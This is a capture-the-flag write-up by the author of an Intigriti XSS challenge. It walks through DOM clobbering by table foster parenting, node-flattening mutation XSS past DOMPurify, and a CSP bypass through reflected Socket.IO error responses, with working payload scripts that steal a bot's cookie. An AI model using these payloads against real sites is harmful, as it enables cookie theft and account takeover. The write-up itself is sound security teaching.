This month, I authored a difficult XSS challenge for Intigriti, ending up with only a few impressive solves. While exploring rabbit holes in another challenge, the idea for this one occurred to me, and I eventually got it to work after a lot of trial and error. That made for a fun Mutation XSS technique, combined with another more practical one to bypass CSPs using a powerful Socket.IO gadget.
You can still play the challenge at challenge-0725.intigriti.io before I spoil the solution. If you're just here to learn the techniques, here's a breakdown.

Summary:

  1. Notice DOMPurify allows id= attributes to DOM Clobber document.getElementById(...) calls, but only if the injected element comes before the original one. Our input gets injected into a <div id="chat-messages"> normally.
  2. By nesting many <table> elements, node flattening is reached after 512 elements, and an <iframe> element can be put where it isn't supposed to be. After the reparse, the iframe gets moved out, above the table, allowing it to clobber id="chat-messages".
  3. Sending a second message now writes into the iframe's children, which are not escaped on serialization. Because <iframe> is a raw text element, it can be closed by <a id="</iframe>"> to allow Mutation XSS.
  4. Bypass the CSP using the Socket.IO polling endpoint, by sending a request for an invalid namespace that reflects the name in valid JavaScript syntax (44/alert(origin),{"message":"Invalid namespace"}). 💥

The Challenge

Upon first visiting the challenge page, we see a login screen that asks for a username to start a chat. In the bottom-right corner, there is also a button to download the challenge's source code:

Login screen asking for username, and a source code download button

We can download the source, unzip it, and then use docker compose up --build to start it locally. After that, it will be available on http://localhost:3000 for testing.

Entering a username, we get redirected to a random /chat/:uuid URL and see a chat interface:

Chat window with a join message and "Hello, world!"

Multiple users can join the same chat to interact, and there is an Invite Bot button. It invites the bot that we need to XSS to get the flag. We can see this in the code (app/index.js):

import bot from './bot.js';
...
app.get('/bot', (req, res) => {
  // Add captcha to the bot page (not related to challenge)
  ...
  res.send(html);
});
app.post('/bot', bot);

The GET endpoint shows a simple interface for passing a channel ID (the UUID in the URL), and sends a POST request to trigger the bot (app/bot.js):

import puppeteer from 'puppeteer';

export default async function handler(req, res) {
  const { channel, 'g-recaptcha-response': grecaptchaResponse } = req.body;
  ...
  res.on('finish', async () => {
    // Runs after the response is sent
    ...
    await context.setCookie({
      name: "flag",
      value: process.env.FLAG,
      domain: HOST.replace(/https?:\/\//, "")
    });
    ...
    // Login
    await page.evaluateOnNewDocument(() => {
      localStorage.setItem('username', "bot");
    });

    // Visit chat
    await sleep(1_000);
    const url = HOST + `/chat/${channel}`;
    console.log(`[BOT] Visiting ${url}...`);
    await page.goto(url);
    await page.waitForSelector("#message-form");
    // Send a message in the chat
    await sleep(1_000);
    await page.type("#message-form input[name='message']", "Beep boop 🤖... Hello everyone!");
    await page.click("#message-form button[type='submit']");
    ...
  });
  
  // Redirect user back to chat, so they can see the bot
  res.redirect(`/chat/${channel}`);
}

The bot enters the chat and sends a message, then sits there for 10 seconds before leaving. Somehow, during this time, we need to trigger an XSS on them to leak the flag stored in their flag= cookie.

The messaging is implemented using Socket.IO, with a channel for each chat on the server side. Apart from that, there are no dynamic endpoints: everything returns static HTML (app/index.js), along with a consistent list of security headers set using middleware:

const app = express();
app.use(express.static('public'));

app.use(function (req, res, next) {
  res.setHeader(
    "Content-Security-Policy",
    `default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; base-uri 'none'; frame-src 'none'; form-action 'self'`
  );
  res.setHeader("X-Content-Type-Options", "nosniff");
  res.setHeader("X-Frame-Options", "DENY");

  next();
});

app.get('/', (req, res) => res.redirect('/login'));
app.get('/login', (req, res) => res.sendFile(path.resolve('public/login.html')));
app.get('/chat/:id', (req, res) => res.sendFile(path.resolve('public/chat.html')));
...
io.on('connection', (socket) => {
  ...

For XSS, we should focus on the client-side, especially JavaScript, to figure out how malicious scripts may be executed. The chat involves quite a bit of logic. Upon loading the page, we join the channel using Socket.IO and can send messages by submitting a form (app/public/chat.js):

const socket = io();

socket.emit("join_channel", { channelId, username });

// Send message
document.addEventListener("submit", (e) => {
  if (e.target.id !== "message-form") return;
  e.preventDefault();

  const messageInput = e.target.message;
  const message = messageInput.value.trim();
  if (message) {
    socket.emit("send_message", message);
    messageInput.value = "";
    messageInput.setAttribute("value", "");
  }
});

The server handles this with the following function (app/index.js):

socket.on('send_message', errorHandler((message) => {
  if (!currentChannel) return;

  console.log(`${currentChannel} - ${currentUser.username}: ${message}`);

  io.to(currentChannel).emit('message', {
    type: 'user',
    username: currentUser.username,
    color: currentUser.color,
    text: message,
    timestamp: new Date().toISOString()
  });
}));

This simply relays the message to everyone connected to the channel. They receive it in the following handler (app/public/chat.js):

// Receive messages
socket.on("message", (message) => {
  const messageElement = document.createElement("div");
  messageElement.className = "message";

  // timestamp
  const timeSpan = document.createElement("span");
  timeSpan.className = "timestamp";
  timeSpan.textContent = new Date(message.timestamp).toLocaleTimeString([], { hour: "2-digit", minute: "2-digit" });
  messageElement.appendChild(timeSpan);
  // username
  if (message.username) {
    const usernameSpan = document.createElement("span");
    usernameSpan.className = "username";
    usernameSpan.textContent = message.username;
    usernameSpan.style.color = `hsl(${message.color}deg, 100%, 50%)`;
    messageElement.appendChild(usernameSpan);
  }
  // message text
  const textSpan = document.createElement("span");
  textSpan.appendChild(DOMPurify.sanitize(message.text, { RETURN_DOM_FRAGMENT: true, ADD_TAGS: ["iframe"] }));
  messageElement.appendChild(textSpan);

  const chatMessages = document.getElementById("chat-messages");
  chatMessages.appendChild(messageElement);
  chatMessages.scrollTop = chatMessages.scrollHeight;
  document.body.innerHTML = document.body.innerHTML;
});

It creates a timestamp, a username, and a message text element. The latter is much more interesting than the rest because it parses our message.text as HTML using DOMPurify.
Another thing of note is the line all the way at the bottom, document.body.innerHTML = document.body.innerHTML. While assigning a property to itself may look like it does nothing, in this case, reading and assigning to the .innerHTML will first serialize and then reparse the DOM, known as a "round-trip". This is interesting in the case of HTML because, as the specification warns, the tree before and after a round trip may be different! (spec)

Warning stating that a parsing roundtrip may return different tree structure

DOM Clobbering

One attack that HTML sanitizers can hardly protect against is DOM Clobbering. It makes use of a strange browser feature where HTML elements are accessible as properties of the window object via their id= attribute. For example, an element like <img id="something"> will be accessible via the global variable something. This application has no gadgets that rely on such globals, but it does have a more direct one.

There are many uses of document.getElementById(...), which essentially does the same. DOMPurify won't sanitize id= attributes, so we can try to hijack any of the elements the page looks for. One interesting target is chat-messages, because our HTML gets inserted into it every time a message is received. If we can override it with some obscure element that has special parsing rules, we may be able to do something similar to what @kevin_mizu presented here.

Before going there, we still need to make DOM Clobbering work. We can try to inject <svg id="chat-messages">, which will be allowed, but isn't instantly useful to overwrite document.getElementById("chat-messages"):

DevTools showing two elements with the same ID, but only first is returned

The problem is that it always returns the first element found in the tree, which can never be our input because our input is necessarily inside of the real chat messages, so it must come after it as a child. We either need to give up on this idea, or find a way to write our element somewhere before the regular chat messages element.
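The "first element in the tree wins" rule can be sketched with a toy model. This is not a real DOM implementation: the node() helper and getElementByIdModel() are hypothetical names, and the trees are simplified stand-ins for the chat page.

```javascript
// Toy model of document order; not a real DOM implementation.
// Each node is { tag, id, children }.
function node(tag, id, children = []) {
  return { tag, id, children };
}

// Depth-first, pre-order search: a parent is visited before its children,
// and earlier siblings are visited before later ones.
function getElementByIdModel(root, id) {
  if (root.id === id) return root;
  for (const child of root.children) {
    const found = getElementByIdModel(child, id);
    if (found) return found;
  }
  return null;
}

// The injected element sits inside the real container, so the real one wins.
const nested = node("body", null, [
  node("div", "chat-messages", [node("svg", "chat-messages")]),
]);

// Hypothetical layout where the injected element precedes the real one.
const hoisted = node("body", null, [
  node("svg", "chat-messages"),
  node("div", "chat-messages"),
]);

console.log(getElementByIdModel(nested, "chat-messages").tag);  // div
console.log(getElementByIdModel(hoisted, "chat-messages").tag); // svg
```

Only the second layout lets the injected element win the lookup, which is why the rest of this section is about getting our element to appear earlier in the tree.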

In previous Mutation XSS related writeups, a feature caught my attention. It's called "foster parenting" and is unique to <table> elements. What it does is move invalid elements in a table above it, for example:

<table id="1">
  <div id="2">Hello, world!</div>
</table>

Turns into:

<div id="2">Hello, world!</div>
<table id="1">
</table>

The elements are suddenly re-ordered, which sounds useful for solving our problem. If we can just write an invalid element while the parser is in the "in-table" insertion mode, it should pop the element out somewhere higher, earlier in the DOM. It just so happens (😉) that the chat.html page is wrapped in a table layout like this:

<!DOCTYPE html>
<html lang="en">
  ...
  <body>
    <div class="container">
      <table>
        <tr>
          <td class="header" colspan="2">Instant Realtime Communication</td>
        </tr>
        <tr>
          ...
          <td>
            <div id="chat-messages" class="chat-area"></div>
          </td>
        </tr>
        ...
      </table>
    </div>
  </body>
</html>

Creating an invalid element inside the <div id="chat-messages"> may pop it out above the top-most <table>, which will then be first in the DOM, and allow us to clobber chat-messages!

Creating an invalid element like this is easier said than done. Because our input is inside a <td> tag, it switches to the "in cell" insertion mode. From here, whatever tag we start has two possible options:

Starting with caption or similar tags closes the cell, anything else parsed as "in body"

The "Anything else" case just parses as a regular body, so there is no chance to trigger foster parenting there. We need to get back to the table. It looks like <caption>, <col> and similar tags might allow this, so we can try (Dom-Explorer):

<table><tr><td><col><div id="clobbered">
<div id="clobbered"></div>
<table>
  <tbody>
    <tr>
      <td></td>
    </tr>
  </tbody>
  <colgroup>
    <col>
  </colgroup>
</table>

This looks good! Would <col><div id="clobbered"> pass DOMPurify? The source code says it should, but when trying to do so, it still gets sanitized:

DOMPurify.sanitize('<col><div id="clobbered">')
// '<div id="clobbered"></div>'

Looking further, even without sanitizing it gets removed when using DOMParser.parseFromString():

new DOMParser().parseFromString('<col><div id="clobbered">', "text/html").body.innerHTML
// '<div id="clobbered"></div>'

Is the browser sanitizing this by itself?! No, this happens because <col> is not valid in the body context that it starts in:

"col" element is ignored in body

Unfortunately, this applies to all the alternative elements we found to escape the <td>: they are ignored when parsed in the body rather than in a table. We can't escape the <td> because none of the elements that would allow it are accepted directly in the <body>.

Node flattening

At this point, you may be thinking about nested tables and how the parsing would interact there. Maybe it's possible to build some combination of elements that is valid in the "in body" insertion mode, so that DOMPurify lets it through. Then, once the browser inserts it into the DOM inside the table, it would no longer be valid there, and foster parenting would move our injected element to the top of the table.

Another good idea for creating weird situations is a trick semi-recently discovered by @IcesFont which triggered a chain reaction of many DOMPurify bypasses in a short time. The trick utilizes "node flattening", where the browser will limit how deeply nested elements may be. Simply said, it will stop nesting the elements after 512 levels:

<body><div*513>
<body>
  <div>
    <div*508>
      <div>
        <div>
        <div>  <-- Notice these don't go deeper
        <div>

The important fact here is that during serialization, the deeper elements aren't nested anymore either; in the above example, the last 3 <div> tags end up as siblings at the same level. Remember the document.body.innerHTML = document.body.innerHTML operation we noticed? It causes a round-trip, which is serialization and reparsing. We can create a DOM tree that's parsed as a lot of nested elements and inserted into the DOM as such. During serialization, the deepest nested elements are flattened, causing them to get into situations that may normally be impossible. The parser will then have to deal with that, potentially causing mutations.

For this challenge, we can make an example with a table deeply nested to the limit. Once flattened and reparsed, the result is very interesting (Dom-Explorer):

Roundtrip causes clobbered element to jump up during the second parsing

The first DomParser represents what DOMPurify sees (minus the <table><tr><td> prefix): everything is deeply nested but still inside the root table. However, the second DomParser shows what the DOM looks like after a round trip: the <div id="chat-messages"> has moved up above the topmost <table>. This is because, after the first parsing, node flattening pushed it out of its <td>. It is now directly inside the <tbody>, which isn't allowed, so foster parenting moves it up above the table. Because it now comes before the real chat-messages, we should have clobbered the element, and any future messages will be inserted into it!

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><div id="chat-messages">')

2nd message shows up outside of table in clobbered chat messages element

Mutation XSS

Now back to our original plan: what if we make the clobbered element a special one like <svg>, and then use the following payload, which worked in DOMPurify 3.0.6?

a<style><!--</style><a id="--!><img src=x onerror=alert()>"></a>

Unfortunately, the above payload doesn't make it through the latest version anymore (Dom-Explorer):

a<a></a>

Both the <style> and the <a> tag's id= attribute were removed. The first is due to this check (/<[/\w!]/g), which removes any elements without children that still contain HTML tags, such as our <style> tag. The second is due to this other check (/((--!?|])>)|<\/(style|title)/i) that sanitizes attributes containing closing comments, style, and title tags. These checks are to harden against some known namespace confusion attacks and make it much harder to achieve a bypass.
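To see both checks fire on the old payload, here is a minimal sketch that applies the two regular expressions quoted above to its pieces. It only reproduces the pattern matching, not DOMPurify's surrounding logic, and the variable names are my own.

```javascript
// Regular expressions as quoted in the text; a snapshot, not DOMPurify's full logic.
const TAG_IN_CONTENT = /<[/\w!]/; // "g" flag dropped so .test() stays stateless
const RISKY_ATTRIBUTE = /((--!?|])>)|<\/(style|title)/i;

// Pieces of the old payload:
//   a<style><!--</style><a id="--!><img src=x onerror=alert()>"></a>
const styleText = "<!--";                        // text content of the <style> element
const idValue = "--!><img src=x onerror=alert()>"; // value of the id= attribute

const styleRemoved = TAG_IN_CONTENT.test(styleText);
const idRemoved = RISKY_ATTRIBUTE.test(idValue);

console.log({ styleRemoved, idRemoved }); // both true: neither piece survives
```

The "<!" in the style content trips the first pattern, and the "--!>" at the start of the attribute trips the second, which matches the sanitized output a<a></a>.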

Still, we have a pretty powerful primitive on our hands. We are able to direct DOMPurify's output into any element we want. Instead of stopping at <svg>, why not insert directly into a <style> tag? DOMPurify will sanitize our input as HTML, but after the round-trip it is parsed as CSS text. These are very different contexts. We could write something like <a id="</style><img src onerror=alert()>">, for example, which DOMPurify sees as just an <a> tag with an attribute. Surrounded by a <style> tag, however, the parser closes the style upon seeing </style>, returns to HTML, and triggers XSS with the image.

Unfortunately this hits the extra attribute check from DOMPurify again... What other tags similar to <style> are there that serialize their contents without escaping them, and parse as text? This is actually a pretty well-defined selection:

List of text tags that are not escaped on serialization

We get to choose between style, script, xmp, iframe, noembed, noframes, or plaintext. Of these, only style is allowed by default. But the configuration we're dealing with has an exception:

DOMPurify.sanitize(message.text, { RETURN_DOM_FRAGMENT: true, ADD_TAGS: ["iframe"] })
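Before relying on that exception, it helps to check which raw-text closing tags the attribute regular expression quoted earlier actually catches. The sketch below runs it over the list of tags from above; closingTagsPassingCheck() is a hypothetical helper, and passing this check says nothing about whether the tag itself is allowed.

```javascript
// Attribute check as quoted earlier in the text.
const ATTRIBUTE_CHECK = /((--!?|])>)|<\/(style|title)/i;

// Elements whose contents are serialized without escaping.
const RAW_TEXT_TAGS = ["style", "script", "xmp", "iframe", "noembed", "noframes", "plaintext"];

// Returns the tags whose closing tag would survive inside an attribute value.
function closingTagsPassingCheck(tags) {
  return tags.filter((tag) => !ATTRIBUTE_CHECK.test(`</${tag}>`));
}

const passing = closingTagsPassingCheck(RAW_TEXT_TAGS);
console.log(passing);
```

Only </style> is caught. Of the remaining tags, <iframe> is the one this configuration also lets us create.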

We're allowed <iframe> tags, and best of all, a closing </iframe> tag is allowed in attributes by the DOMPurify regular expression! This means our solution will be to use DOM Clobbering to create an <iframe id="chat-messages">, and then send a 2nd message that writes the following content into it: <a id="</iframe><img src onerror=alert(origin)>">. After the round-trip, this should interpret the image as a real HTML tag and trigger the XSS. Let's try it:

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", '<a id="</iframe><img src onerror=alert(origin)>">')

Image injected with two messages, but fails due to CSP

Success! Well... kind of. We successfully injected our XSS payload, but it doesn't trigger yet because of a CSP. What is it defined as?

Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; base-uri 'none'; frame-src 'none'; form-action 'self'

Alright, no obvious bypasses yet, we'll have to investigate this a little further before we see our shiny alert.

CSP Bypass using Socket.IO

script-src 'self' is most important to us, because at some point we want to run scripts. The rule means we may only load scripts from the current host, so any relative paths. There aren't many in this challenge because all endpoints only return static HTML, JS, or CSS files. But we can see one creeping around in our Network tab:

socket.io polling requests DevTools Network tab

This Socket.IO endpoint with ?transport=polling returns some weirdly formatted data in Content-Type: text/plain. It's a simple GET request with a special URL. Is there a chance we could use such a response containing arbitrary JavaScript to bypass the CSP? You might quickly say no because the /chat/:uuid endpoint responds with:

X-Content-Type-Options: nosniff

But it is important to understand that this header only applies to the response it is set on, not the whole document. These Socket.IO responses don't have an X-Content-Type-Options header, so by default they are allowed to be loaded as any content type, including JavaScript. But can we really make this weird custom protocol return valid JavaScript to perform our flag exfiltration?
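As a rough mental model of the two gates a script load has to pass here, consider the sketch below. It is a simplification under stated assumptions: the function names are hypothetical, the JavaScript MIME list is partial, and real browsers apply further rules that are ignored here.

```javascript
// Simplified model; not the browser's full algorithm.
// Partial list of JavaScript MIME types (assumption for illustration).
const JS_MIME_TYPES = new Set(["text/javascript", "application/javascript"]);

// script-src 'self': the resolved script URL must share the page's origin.
function matchesSelf(pageOrigin, scriptUrl) {
  return new URL(scriptUrl, pageOrigin).origin === new URL(pageOrigin).origin;
}

// nosniff only matters when it is present on the script's own response.
function blockedByNosniff(headers) {
  const nosniff = (headers["x-content-type-options"] || "").toLowerCase() === "nosniff";
  const mime = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  return nosniff && !JS_MIME_TYPES.has(mime);
}

function canLoadAsScript(pageOrigin, scriptUrl, headers) {
  return matchesSelf(pageOrigin, scriptUrl) && !blockedByNosniff(headers);
}

// Polling response: same origin, text/plain, no nosniff header (sid is a placeholder).
const pollingAllowed = canLoadAsScript(
  "http://localhost:3000",
  "/socket.io/?EIO=4&transport=polling&sid=abc",
  { "content-type": "text/plain; charset=UTF-8" }
);
console.log(pollingAllowed);
```

Under this model, the same response would be rejected if it also carried X-Content-Type-Options: nosniff, which is exactly the header it lacks.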

We already see examples where part of our input, the messages, is returned in the response. The problem is that these are always correctly JSON-formatted by the server. Still, they happen to be valid JavaScript, which is promising if we're able to find variations of this.

> 42["message",{"type":"system","text":"<i style=\"color: #7f8c8d\"><span style=\"color: hsl(48deg, 100%, 50%)\">Jorian</span> has joined the channel</i>","timestamp":"2025-05-16T18:43:59.337Z"}]
< undefined

https://socket.io/docs/v4/socket-io-protocol/

We can read the above protocol description to learn about all the different things it can output. One example stands out:

With a custom namespace:
Packet: { type: EVENT, namespace: "/admin", data: ["bar"] }
Encoded: 2/admin,["bar"]

If we were to run this in JavaScript, it would try to resolve the admin variable. We can replace it with alert() later:

> 2/admin,["bar"]
< Uncaught ReferenceError: admin is not defined

But this is a packet from the client, we need one that the server sends to us as a response. Let's try to forge the above packet anyway and see what the server does with it:

io("/alert()", {transports: ["polling"]}).emit("test")

The error in the response is... wait...

44/alert(),{"message":"Invalid namespace"}

The error message is valid JavaScript, including our namespace input! All we have to do now is prepare such a URL without requesting it ourselves, as that would consume the response. Polling works like this:

  1. Request a new session ID
  2. Start a GET request that won't get a response yet
  3. Send a POST request with your message
  4. Finally, the GET request from step 2 gets resolved to the result from step 3

So we simply need to do steps 1 and 3 on our side, then craft the URL one would normally request for step 2 and give it to the victim, so that step 4 happens inside their browser during the XSS. It should return our prepared content and execute some JavaScript payload.
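For reference, the numeric prefixes in these polling bodies can be decoded with a small sketch. The first digit is the Engine.IO packet type and the second is the Socket.IO packet type. describePollingPacket() is a hypothetical helper that handles only single, simple packets; it ignores ack IDs, binary attachments, and batched payloads.

```javascript
// Packet type tables from the Engine.IO and Socket.IO protocols.
const ENGINE_TYPES = ["open", "close", "ping", "pong", "message", "upgrade", "noop"];
const SOCKET_TYPES = ["CONNECT", "DISCONNECT", "EVENT", "ACK", "CONNECT_ERROR", "BINARY_EVENT", "BINARY_ACK"];

// Decodes one polling body such as '40/alert(origin),' into its parts.
function describePollingPacket(body) {
  const engineType = ENGINE_TYPES[Number(body[0])];
  if (engineType !== "message") {
    // Engine.IO-level packets (like the handshake) carry no Socket.IO type.
    return { engineType, socketType: null, namespace: null, payload: body.slice(1) };
  }
  const socketType = SOCKET_TYPES[Number(body[1])];
  let rest = body.slice(2);
  let namespace = "/"; // default namespace when none is given
  if (rest.startsWith("/")) {
    // A custom namespace runs up to the first comma.
    const comma = rest.indexOf(",");
    const end = comma === -1 ? rest.length : comma;
    namespace = rest.slice(0, end);
    rest = rest.slice(end + 1);
  }
  return { engineType, socketType, namespace, payload: rest };
}

console.log(describePollingPacket("40/alert(origin),"));
console.log(describePollingPacket('44/alert(origin),{"message":"Invalid namespace"}'));
```

Read this way, step 3 sends a CONNECT for the namespace /alert(origin), and the server answers with a CONNECT_ERROR that echoes the same namespace.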

Half-following the protocol like this isn't possible with the official Socket.IO API, so we'll have to go a bit more manually using raw fetch() requests inspired by what we see in the Network tab going back and forth:

// Step 1 (request session ID)
res = await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling"})).then(r => r.text());
sid = JSON.parse(res.slice(1))["sid"];
// Step 3 (send POST message)
await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid}), {
    method: "POST",
    body: "40/alert(origin),"
});
// Step 2 (craft URL for response)
url = "/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid});
console.log(url);

This prints a URL that, when viewed in the browser, responds with:

44/alert(origin),{"message":"Invalid namespace"}
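As a quick sanity check outside the browser, this body can be evaluated as JavaScript with stubbed globals. The sketch below uses new Function, which is only an approximation of a real <script src> load; runAsScript() is a hypothetical helper, and alert and origin are stand-ins.

```javascript
// Runs a response body as JavaScript, exposing only the given names.
// This approximates a script load; it is not identical to one.
function runAsScript(body, globals = {}) {
  const names = Object.keys(globals);
  const fn = new Function(...names, body);
  return fn(...names.map((name) => globals[name]));
}

const calls = [];
runAsScript('44/alert(origin),{"message":"Invalid namespace"}', {
  alert: (value) => calls.push(value), // stub that records its argument
  origin: "http://localhost:3000",     // stand-in for window.origin
});

console.log(calls); // [ 'http://localhost:3000' ]
```

The body parses as a division followed by a comma expression ending in an object literal, so the reflected call runs before the rest is discarded.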

We now need to put this into a <script src="..."> using our Mutation XSS, to get it to bypass the CSP. Because our sink of .innerHTML doesn't execute script tags, we need to wrap it in an <iframe srcdoc="...">, which creates a new document that does load script tags. This is no problem for us at this point, because we've completely bypassed the sanitizer.

The JavaScript snippet below will trigger the XSS via the received messages:

socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", `<a id="</iframe><iframe srcdoc='<script/src=${url}></script>'>">`)

Successful alert on ourselves by running JavaScript in Console

The final goal is to steal the flag= cookie from the Bot. We can invite it to our chat, and then send the above messages again to trigger XSS on it and exfiltrate the cookies. All that's left to do is update the POST body to use a flag-stealing payload like reading document.cookie and sending it as a message back to us.

body: "40/(top.document.querySelector('form input').value=document.cookie)-top.document.querySelector('form button').click(),"
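Note that the payload joins its two expressions with - rather than a comma, presumably because the namespace ends at the first comma. The sketch below evaluates the reflected response against stubbed objects to show the order of effects. The stubs (fakeTop, fakeDocument) and the cookie value are made up for illustration; in the real attack, top is the chat page that contains the srcdoc iframe.

```javascript
// Namespace part of the POST body from above, split for readability.
const exfilNamespace =
  "/(top.document.querySelector('form input').value=document.cookie)" +
  "-top.document.querySelector('form button').click()";

// What the server would reflect back for this invalid namespace.
const reflected = `44${exfilNamespace},{"message":"Invalid namespace"}`;

// Stubs standing in for the chat page's message form.
const input = { value: "" };
let clicks = 0;
const button = { click: () => { clicks += 1; } };
const fakeTop = {
  document: {
    querySelector: (selector) => (selector === "form input" ? input : button),
  },
};
const fakeDocument = { cookie: "flag=CTF{example}" }; // placeholder value

// Evaluate the response with the stubs bound to `top` and `document`.
new Function("top", "document", reflected)(fakeTop, fakeDocument);

console.log(input.value, clicks);
```

The assignment on the left of the - runs first and fills the message input with the cookie, then the right side clicks the submit button, so the bot sends its own cookie into the chat.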

Then, we send it over the chat right after we invite the bot, making sure not to XSS ourselves at this point, as it would invalidate the polling URL. This can simply be done by overwriting some function, like DOMPurify.sanitize = console.log;.

// Run this when the bot joins right after pressing *Invite Bot*
DOMPurify.sanitize = console.log;  // Prevent XSS'ing ourselves, but still see response messages
res = await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling"})).then(r => r.text());
sid = JSON.parse(res.slice(1))["sid"];
await fetch("/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid}), {
    method: "POST",
    body: "40/(top.document.querySelector('form input').value=document.cookie)-top.document.querySelector('form button').click(),"
});
url = "/socket.io/?" + new URLSearchParams({EIO: 4, transport: "polling", sid});
socket.emit("send_message", '<div>'.repeat(510) + '<table><tr><td><iframe id="chat-messages">')
socket.emit("send_message", `<a id="</iframe><iframe srcdoc='<script/src=${url}></script>'>">`)

If timed correctly, we quickly receive a message back from the bot containing the flag! flag=CTF{st4Ck1Ng_T4Bl3S_'t1Ll_1T_C0M3S_Cr4Sh1Ng_D0Wn,_S0Ck3T10_1S_Such_4_Gr34T_G4Dg3T!}